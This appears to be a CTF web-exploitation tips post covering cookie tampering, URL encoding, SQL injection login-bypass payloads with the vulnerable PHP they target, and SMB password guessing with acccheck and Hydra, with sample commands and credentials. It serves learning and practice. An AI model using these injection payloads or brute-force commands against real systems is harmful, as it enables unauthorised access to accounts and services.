This post (Work in Progress) lists the tips and tricks while doing Web Exploitation challenges during various CTF’s.
You may want to use your browser to view the source of the web page (Right click View Source or Cntrl + U . Sometimes, important information is hidden using comments.
If there are some files/ directories like http://example.org/files/pixel.png, probably http://example.org/files/ might be a directory listing containing some information. Also, always good to check robots.txt file
Cookies plays a important part in remembering the state. For example: loggedin=0 means you are not logged in and just changing that to loggedin=1 gives you the access.
It may be helpful to learn how to 'Inspect Elements' in your browser. It helps you to distinguish each element which might be or not be hidden.
Some symbols need to be URL Encoded when included in GET requests.
Reserved characters after percent-encoding
! # $ & ' ( ) * + , / : ; = ? @ [ ] %21 %23 %24 %26 %27 %28 %29 %2A %2B %2C %2F %3A %3B %3D %3F %40 %5B %5D
Common characters after percent-encoding (ASCII or UTF-8 based)
newline space " % - . < > \ ^ _ ` { | } ~ %0A or %0D or %0D%0A %20 %22 %25 %2D %2E %3C %3E %5C %5E %5F %60 %7B %7C %7D %7E
In some web exploitation challenges, if the secret is stored on the client side and there are some javascript involved, you could possibly find the answer in the Javascript console, Browser Developer Tools. (F12 Key).
Websites keep track of you (Whether you are login-ed or not) by keeping a cookie for you, check that if the value (if easy and most probably assigned linearly) of cookie can be changed to any user who might already be logined.
If the Login prompt contains SQL query and check contains only one result if (mysqli_num_rows($result) !== 1), then use limit 1 such as admin' or 1=1 limit 1;#
$username = $_POST["username"]; $password = $_POST["password"]; $query = "SELECT * FROM users WHERE username='$username' AND password='$password'"; $result = mysqli_query($con, $query); if (mysqli_num_rows($result) !== 1) { echo "<h1>Login failed.</h1>"; } else { echo "<h1>Logged in!</h1>"; echo "<p>Your flag is: $FLAG</p>"; }
If the Login prompt contains SQL query and checks only one result, plus have extra checks (see example below), then we can create a fake row SQL whose value we control.
$con = mysqli_connect("localhost", "sql2", "sql2", "sql2"); $username = $_POST["username"]; $password = $_POST["password"]; $query = "SELECT * FROM users WHERE username='$username'"; $result = mysqli_query($con, $query); $logged_in = false; if (mysqli_num_rows($result) === 1) { $row = mysqli_fetch_array($result); if ($row["password"] === $password) { $logged_in = true; echo "<h1>Logged in!</h1>"; echo "<pre>User level: ", $row["user_level"], "</pre>"; if ($row["user_level"] >= 1337) { echo "<p>Your flag is: $FLAG</p>"; } else { echo "<p>Only user levels 1337 or above can see the flag.</p>"; } } } You have to create a fake query such as
random'AND 1=0 UNION ALL SELECT 'admin' AS username, 'hax' AS password, 2000 AS user_level -- where The ' closes the username string and 1=0 will always return false, invalidating the first half. The union all statement allows us to concatenate two SQL select queries, so we append UNION ALL and then our fake select statement.Don't forget to enter the same password in the password field :P
- Perl Script running on a webpage, read Security Issues in Perl Scripts.
- In some web exploitation excercises, you can modify the GET/POST request in the burpsuite to get the flag.
passthru — Execute an external program and display raw output
The passthru() function is similar to the exec() function in that it executes a command. This function should be used in place of exec() or system() when the output from the Unix command is binary data which needs to be passed directly back to the browser.
Warning When allowing user-supplied data to be passed to this function, use escapeshellarg() or escapeshellcmd() to ensure that users cannot trick the system into executing arbitrary commands.
Unlike the smbmap and crackmapexec, acccheck can only be used for validating the credentials gathered.
acccheck v0.2.1 - By Faiz Description: Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been chosen, and tries a combination of usernames and passwords in the hope to identify the password to a given account via a dictionary password guessing attack. Usage = ./acccheck [optional] -t [single host IP address] OR -T [file containing target ip address(es)] Optional: -p [single password] -P [file containing passwords] -u [single user] -U [file containing usernames] -v [verbose mode]
acccheck -t 10.7.3.17 -u backup4idc -p bckp@123
SUCCESS.... connected to 192.168.4.32 with username:'Administrat0r' and password:'P@ssw0rd!'
End of Scan
Here, we can give a list of hosts in a text file format as well by specifying the '-T' flag.
Hydra is powerful command line tool which can be used for brute-forcing several services such as smb, HTTP, RSH, ssh etc. It can also be used for validating the credentials.
Hydra v8.5 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes. Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-ISOuvVd46] [service://server [:PORT][/OPT]] Options: -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -C FILE colon separated "login:pass" format, instead of -L/-P options -M FILE list of servers to attack, one entry per line, ':' to specify port -t TASKS run TASKS number of connects in parallel per target (default: 16) -U service module usage details -h more command line options (COMPLETE HELP) server the target: DNS, IP or 192.168.0.0/24 (this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help)
hydra -l Administrat0r -p P@ssw0rd! -M hosts1.txt service smb